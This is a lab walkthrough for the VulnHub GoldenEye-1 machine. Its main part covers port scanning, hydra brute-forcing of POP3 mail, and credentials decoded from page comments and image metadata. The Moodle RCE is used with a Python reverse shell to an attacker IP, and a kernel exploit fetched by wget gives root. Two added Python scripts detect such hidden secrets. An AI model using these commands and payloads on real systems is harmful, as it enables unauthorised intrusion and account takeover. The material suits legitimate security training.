Vulnhub GlodenEye-1

admin, 2023-12-25 16:55:32
title: Vulnhub-GlodenEye-1
categories:
  - VulnHub
tags:
  - Linux
  - nmap
  - gobuster
  - JavaScript
  - html
  - POP3
  - Email
  - hydra
  - Password brute-forcing
  - exiftool
  - strings
  - Moodle
  - RCE
  - searchsploit
  - metasploit
  - Name resolution
cover: /images/Vulnhub.png
abbrlink: 71172b32

0x01 Target Introduction

  • Name: GoldenEye: 1
  • Date release: 4 May 2018
  • Author: creosote
  • Series: GoldenEye
  • Description: The goal is to get root and capture the secret GoldenEye codes - flag.txt.

Download address:

https://www.vulnhub.com/entry/goldeneye-1,240/

0x02 Reconnaissance

Port scanning

First, run a port scan with nmap

nmap -p- -sV -sC -A 192.168.0.103 -oA nmap_GlodenEye-1


The scan shows ports 25, 80, 55006 and 55007 open on the target

Port 80

Visiting http://192.168.0.103 shows a hint that there is a /sev-home directory to log in to


Visiting http://192.168.0.103/sev-home/ presents a login page


Directory scanning

Directory brute-forcing with gobuster finds no useful directories or files

gobuster dir -u http://192.168.0.103 -w /usr/share/wordlists/dirb/big.txt


0x03 Getting a shell [www-data]

Information gathering

Viewing the page source reveals a JavaScript file, terminal.js


The source of http://192.168.0.103/terminal.js is as follows:


var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];

//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;

  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}

Decode the HTML-entity-encoded characters in the comment; the comment also gives two usernames, Boris and Natalya

&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
# decoded: InvincibleHack3r
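As an added example (not part of the original write-up), the following Python scans JavaScript source for runs of numeric HTML entities inside comments and decodes them; it is the check a reviewer of static assets would run to catch a password hidden the way terminal.js hides Boris's. The sample source is constructed here and reuses only the entity string shown above.

```python
import re

# Line and block comments. "//" inside string literals (e.g. URLs) is also
# caught; that only costs a few extra candidates, never a missed one.
COMMENT_RE = re.compile(r"//([^\n]*)|/\*(.*?)\*/", re.DOTALL)
# Runs of two or more numeric entities, decimal (&#73;) or hex (&#x49;).
ENTITY_RUN_RE = re.compile(r"(?:&#(?:x[0-9A-Fa-f]+|[0-9]+);){2,}")
ENTITY_RE = re.compile(r"&#(x?)([0-9A-Fa-f]+);")


def decode_entities(run: str) -> str:
    """Turn '&#73;&#110;' or '&#x49;&#x6e;' into the text it encodes."""
    return "".join(chr(int(digits, 16 if is_hex else 10))
                   for is_hex, digits in ENTITY_RE.findall(run))


def find_encoded_comments(js_source: str):
    """Return (raw_run, decoded_text) for each entity run found in a comment."""
    hits = []
    for m in COMMENT_RE.finditer(js_source):
        body = m.group(1) if m.group(1) is not None else m.group(2)
        for run in ENTITY_RUN_RE.findall(body):
            hits.append((run, decode_entities(run)))
    return hits


# Constructed sample modelled on terminal.js; only the entity run is from the page.
SAMPLE_JS = """\
var data = [{ text: "Navigate to /sev-home/ to login" }];
//
//Boris, make sure you update your default password.
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
var url = "http://example.invalid/&#32;";  /* a single entity is not a run */
"""

if __name__ == "__main__":
    for raw, decoded in find_encoded_comments(SAMPLE_JS):
        print(f"{raw}\n  -> {decoded!r}")
```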

Mail service

Logging in with boris/InvincibleHack3r succeeds; the page hints that the target's POP3 mail service is the next step


Port 55007 on the target is the POP3 mail service


Use hydra with the collected usernames and a password wordlist to brute-force the POP3 service

hydra 192.168.0.103 -s 55007 pop3 -L user.txt -P /usr/share/wordlists/fasttrack.txt -v


Two sets of credentials are obtained

natalya/bird
boris/secret1!


Log in as natalya and read the mail

nc 192.168.0.103 55007
nc > user natalya
nc > pass bird
nc > list
nc > retr 1
nc > retr 2
nc > retr ...
nc > quit


The two emails read as follows:

## First email

Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.

## Second email

Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

Log in as boris and read the mail

nc 192.168.0.103 55007
nc > user boris
nc > pass secret1!
nc > list
nc > retr 1
nc > retr 2
nc > retr ...
nc > quit


The mailbox contents are as follows:

## First email

Return-Path: <[email protected].goldeneye>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: [email protected]

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.

## Second email

Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!

## Third email

Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: [email protected]

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

Reading the mail yields the credentials xenia/RCP90rulez!; a hosts entry is also added locally so the internal domain resolves

192.168.0.103 severnaya-station.com


Visiting http://severnaya-station.com/gnocertdir shows the following page


Logging in with xenia/RCP90rulez! succeeds


Under My profile > Messages there is a message from the user Dr Doak


The message reads:

09:24 PM: Greetings Xenia,

As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.

My email username is...

doak

Thank you,

Cheers,

Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS

Since a doak account exists, brute-force with hydra once more; the password turns out to be goat

hydra 192.168.0.103 -s 55007 pop3 -l doak -P /usr/share/wordlists/fasttrack.txt -v


Logging into the POP3 service with doak/goat, the mail contains the credentials dr_doak/4England!

nc 192.168.0.103 55007
nc > user doak
nc > pass goat
nc > list
nc > retr 1
nc > quit


The credentials dr_doak/4England! allow logging into the web site, where s3ret.txt contains:


007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

Image analysis

The hint points to http://severnaya-station.com/dir007key/for-007.jpg


After downloading the image, extract its metadata with strings or exiftool

strings for-007.jpg
exiftool for-007.jpg


A Base64-encoded string is found: eFdpbnRlcjE5OTV4IQ==


It decodes to xWinter1995x!

echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d
## decoded: xWinter1995x!
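As an added example (not from the original write-up), the following Python walks the JPEG marker segments itself and flags base64-looking tokens in COM/APPn metadata that decode to printable text; it generalises the strings/exiftool check above to any image sitting in a web root. The sample JPEG is constructed inline and carries only the base64 string the page found; a real file is simply read as bytes and passed to find_encoded_strings.

```python
import base64
import re
import string

# Base64-looking runs of 16+ chars with optional padding (a loose heuristic).
B64_RE = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
PRINTABLE = set(string.printable.encode()) - {0x0B, 0x0C}


def jpeg_segments(data: bytes):
    """Yield (marker, payload) for every marker segment before SOS/EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker byte at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte between segments, skip it
            pos += 1
            continue
        if marker in (0xD9, 0xDA):    # EOI or SOS: metadata ends here
            return
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def find_encoded_strings(data: bytes):
    """Return (marker, token, decoded) for base64 tokens in COM/APPn segments
    that decode to printable text; binary or invalid tokens are skipped."""
    hits = []
    for marker, payload in jpeg_segments(data):
        if marker != 0xFE and not 0xE0 <= marker <= 0xEF:
            continue                  # only COM and APPn carry metadata
        for token in B64_RE.findall(payload):
            try:
                decoded = base64.b64decode(token, validate=True)
            except ValueError:        # binascii.Error: bad length/alphabet
                continue
            if decoded and all(b in PRINTABLE for b in decoded):
                hits.append((marker, token.decode(), decoded.decode()))
    return hits


# Constructed sample: SOI + one COM segment + EOI, no real image data.
_COMMENT = b"Image comment: eFdpbnRlcjE5OTV4IQ== (constructed sample)"
SAMPLE_JPEG = (b"\xff\xd8"
               + b"\xff\xfe" + (len(_COMMENT) + 2).to_bytes(2, "big") + _COMMENT
               + b"\xff\xd9")

if __name__ == "__main__":
    for marker, token, decoded in find_encoded_strings(SAMPLE_JPEG):
        print(f"segment 0x{marker:02X}: {token} -> {decoded!r}")
```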

Logging in as admin/xWinter1995x! gives administrator access


Moodle RCE

Fingerprinting identifies the site's CMS as Moodle, version 2.2.3


Vulnerability lookup

A Google search for this version turns up a remote code execution vulnerability


exploit-db has exploit code for it at https://www.exploit-db.com/exploits/29324


searchsploit can of course also be used to look up Moodle vulnerabilities


Manual exploitation

Under Settings > site administration > Plugins > Text Editor > TinyMCE HTML editor, find Spell engine and change it from Google Spell to PSpellShell; the reason is that the target host has no gcc, only cc


Under Settings > site administration > Server > System paths, find Path to aspell and enter a reverse shell there

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.4",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


Listen on port 8888 locally

nc -nvlp 8888

Under Home > My profile > Blogs > Add a new entry, create a blog post; clicking Toggle Spellchecker triggers the reverse shell


Upgrade to a pty with Python

python -c 'import pty;pty.spawn("/bin/bash")'


MSF exploitation

Exploitation via MSF is also possible

msfconsole
msf > use exploit/multi/http/moodle_cmd_exec
msf exploit(moodle_cmd_exec) > show options
msf exploit(moodle_cmd_exec) > set password xWinter1995x!
msf exploit(moodle_cmd_exec) > set rhosts severnaya-station.com
msf exploit(moodle_cmd_exec) > set targeturi /gnocertdir
msf exploit(moodle_cmd_exec) > run

No session came back on this machine, though; on Kali 2018 the payload does return a shell


0x04 Privilege Escalation [root]

Information gathering

Checking the kernel version shows Ubuntu 3.13.0

uname -a

Search for matching privilege escalation exploits with searchsploit

searchsploit ubuntu 3.13.0


Kernel exploit

37292.c is chosen for privilege escalation

cp /usr/share/exploitdb/exploits/linux/local/37292.c ./

Compile the exploit with gcc

gcc 37292.c -o exp


Start an HTTP server locally

python -m SimpleHTTPServer 80

Download the exploit on the target and make it executable

wget http://172.20.10.4/exp
chmod 777 exp

Running the exploit fails with an error that gcc is missing

./exp


So gcc must be changed to cc in the source before compiling again


cc 37292.c -o ex


Running it again succeeds and yields a root shell


The flag file is found; it says the flag is located under the web directory

cd /root
ls -la
cat .flag.txt


Visiting http://172.20.10.2/006-final/xvf7-flag retrieves the flag


Originally published on the WeChat official account 狐狸说安全: Vulnhub GlodenEye-1

Posted by admin on 2023-12-25 16:55:32. Please keep this link when reposting (CN-SEC, with thanks to the original author): http://cn-sec.com/archives/2333007.html
